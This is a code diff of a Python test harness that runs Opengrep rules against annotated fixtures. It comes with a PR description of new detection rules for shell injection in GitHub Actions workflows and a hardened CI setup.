+        last = proc.stderr.strip().splitlines()[-1] if proc.stderr.strip() else "?"
+        return [f"engine produced no output (exit {proc.returncode}): {last}"]
+    try:
+        data = json.loads(proc.stdout)
+    except json.JSONDecodeError:
+        return [f"could not parse --test --json output (exit {proc.returncode})"]
+
+    failures = [f"rule config error: {cfg}" for cfg in data.get("config_with_errors", [])]
+
+    checks_seen = 0
+    for info in data.get("results", {}).values():
+        for rule_id, check in info.get("checks", {}).items():
+            checks_seen += 1
+            if check.get("passed"):
+                continue
+            for fpath, lines in check.get("matches", {}).items():
+                expected = set(lines.get("expected_lines", []))
+                reported = set(lines.get("reported_lines", []))
+                for line in sorted(expected - reported):
+                    message = f"{rule_id}: expected a finding here but none was produced"
+                    failures.append(f"{rel(fpath)}:{line}  {message}")
+                    annotate("error", fpath, line, message)
+                for line in sorted(reported - expected):
+                    message = f"{rule_id}: unexpected finding (false positive) — annotate with '# ok:' if intended"
+                    failures.append(f"{rel(fpath)}:{line}  {message}")
+                    annotate("error", fpath, line, message)
+
+    # A fixture with no '# ruleid:'/'# ok:' annotations produces no checks; that
+    # is a vacuous (useless) test, not a pass.
+    if checks_seen == 0 and not failures:
+        failures.append(f"{rel(fixture)}: no test cases — fixture has no '# ruleid:'/'# ok:' annotations")
+
+    if not failures and proc.returncode != 0:
+        failures.append(f"engine reported failure (exit {proc.returncode})")
+    return failures
+
+
+def write_step_summary(path: Path, engine: str, results: list[RuleResult], passed: int) -> None:
+    """Append a Markdown results table to the GitHub Actions step summary file."""
+    lines = [
+        "## Opengrep rule regression tests\n",
+        f"Engine: `{engine}` — **{passed}/{len(results)}** rules passed\n",
+        "| Rule | Result |",
+        "|---|---|",
+        *(f"| `{r.name}` | {'✅ pass' if r.passed else '❌ fail'} |" for r in results),
+    ]
+    with path.open("a", encoding="utf-8") as fh:
+        fh.write("\n".join(lines) + "\n")
+
+
+def main() -> int:
+    """Run every rule against its fixture; return the exit code (0 = all passed)."""
+    engine = pick_engine()
+    rules = rule_files()
+    if not rules:
+        sys.exit(f"error: no rule files found in {rel(RULES_DIR)}")
+    fixtures = fixture_index()
+
+    print(f"Running rule regression tests with '{engine}'\n")
+    results: list[RuleResult] = []
+    for rule in rules:
+        result = RuleResult(rule.name)
+        fixture = fixtures.get(rule.stem)
+        if fixture is None:
+            result.failures.append(
+                f"no fixture found (expected a file named '{rule.stem}.*' under {rel(TESTS_DIR)})")
+        else:
+            result.failures.extend(run_one(engine, rule, fixture))
+        results.append(result)
+
+    passed = sum(r.passed for r in results)
+    for result in results:
+        print(f"  [{'PASS' if result.passed else 'FAIL'}] {result.name}")
+        for failure in result.failures:
+            print(f"         {failure}")
+    print(f"\n{passed}/{len(results)} rules passed")
+
+    if GHA and (summary_path := os.environ.get("GITHUB_STEP_SUMMARY")):
+        write_step_summary(Path(summary_path), engine, results, passed)
+
+    return 0 if passed == len(results) else 1
+
+
+if __name__ == "__main__":
+    raise SystemExit(main())

--- a/sast/opengrep/tests/run.py
+++ b/sast/opengrep/tests/run.py
@@ -49,6 +49,11 @@ class RuleResult:
 def pick_engine() -> str:
     """Pick the test engine: $OPENGREP_TEST_BIN, else opengrep, else semgrep."""
     if override := os.environ.get("OPENGREP_TEST_BIN"):
+        # Validate the override now so a typo fails clearly here instead of as a
+        # FileNotFoundError from the first subprocess.run. shutil.which accepts a
+        # bare command name or an explicit path.
+        if not shutil.which(override):
+            sys.exit(f"error: OPENGREP_TEST_BIN={override!r} not found on PATH")
         return override
     for candidate in ("opengrep", "semgrep"):
         if shutil.which(candidate):
@@ -63,11 +68,18 @@ def rule_files() -> list[Path]:
 
 
 def fixture_index() -> dict[str, Path]:
-    """Map each fixture's filename stem to its path (one pass over tests/)."""
+    """Map each fixture's filename stem to its path (one pass over tests/).
+
+    Pairing is by stem, so two fixtures sharing a stem would be ambiguous and
+    could silently mis-pair a rule. Fail loudly instead of guessing.
+    """
     index: dict[str, Path] = {}
     for path in sorted(TESTS_DIR.rglob("*")):
         if path.is_file() and path.name != "run.py" and path.name.lower() != "readme.md":
-            index.setdefault(path.stem, path)  # stems are unique by convention
+            if path.stem in index:
+                sys.exit(f"error: duplicate fixture stem '{path.stem}': "
+                         f"{rel(index[path.stem])} and {rel(path)} — stems must be unique")
+            index[path.stem] = path
     return index
 
 


### PR DESCRIPTION
## Summary
- Adds three GHA shell-injection rules on a severity-tier model:
  - **`security.gha.run-shell-injection` (ERROR)** — fork-controllable, shell-injectable `github.*` contexts interpolated into `run:`/`script:` (PR title/body, `head_ref`, free-text author/label names). This is the bright-line blocking gate.
  - **`security.gha.run-shell-injection-inputs` (WARNING)** — caller-supplied `inputs.*` (reusable-workflow / composite / `workflow_dispatch`).
  - **`security.gha.run-shell-injection-refs` (WARNING)** — non-fork-controlled refs (`github.ref`/`base_ref`/`ref_name`/`pull_request.base.ref`) that can still carry shell metacharacters.
- Intentional exclusions documented inline: charset-constrained identifiers (`*.login`, `*.sha`, repo/org names), `github.workflow`, and write-gated refs. Rules are grounded in GitHub's script-injection docs + GitHub Security Lab, not third-party rulesets.
- Adds a **rule regression-test harness** (`tests/run.py`): each rule is paired with an annotated fixture and run via `opengrep --test`; the runner fails if any rule lacks a fixture or a fixture has no assertions.
- Adds a **CI workflow** (`test-opengrep-rules.yml`) — opengrep pinned by version **and SHA-256**, `contents: read`, path-scoped + `merge_group`.
- Adds a hardened, **cosign-verified** `Dockerfile` (throwaway builder, non-root, multi-arch) for local runs that mirror CI.
- Adds `.semgrepignore` so the intentionally-vulnerable fixtures stay out of the repo's own self-scans.
- Renames `security.gha.missing-explicit-permissions-temporal` → `security.gha.missing-explicit-permissions` (no stale references remain).

## Behavior / rollout notes
- The action is **differential** — it only fails on findings a PR *newly introduces*; pre-existing patterns are reported, not blocked.
- **Known gap:** the action currently blocks on any new finding regardless of severity (`--error` + an unfiltered `.results | length` count in `opengrep-report.sh`), so a newly introduced **WARNING** finding blocks too. Severity-based gating (only ERROR blocks; WARNING reports) is a deliberate follow-up.